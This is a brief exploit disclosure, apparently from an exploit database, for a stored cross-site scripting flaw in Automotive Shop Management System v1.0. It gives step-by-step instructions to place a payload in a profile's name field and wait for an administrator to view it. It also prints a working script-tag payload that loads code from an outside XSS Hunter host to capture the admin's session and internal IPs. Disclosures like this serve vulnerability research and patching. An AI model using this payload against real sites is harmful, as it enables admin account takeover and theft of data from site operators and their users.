Vendor Homepage: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html
Automotive Shop Management System v1.0 suffers from stored XSS Injection Vulnerability allowing remote attackers to gain admin access and view internal IPs.
````````````````````````````````````````To Exploit```````````````````````````````````````````````````` Step 1: Goto Profile Page
Step 2: Put XSS Hunter Payload on Either First Name or Last Name field
Step 3: Wait for Admin to view your details
Step 4: Then you will see xss fires alert on xss hunter page
Payload Used for this Exploit: "><script src=https://d4.xss.ht></script>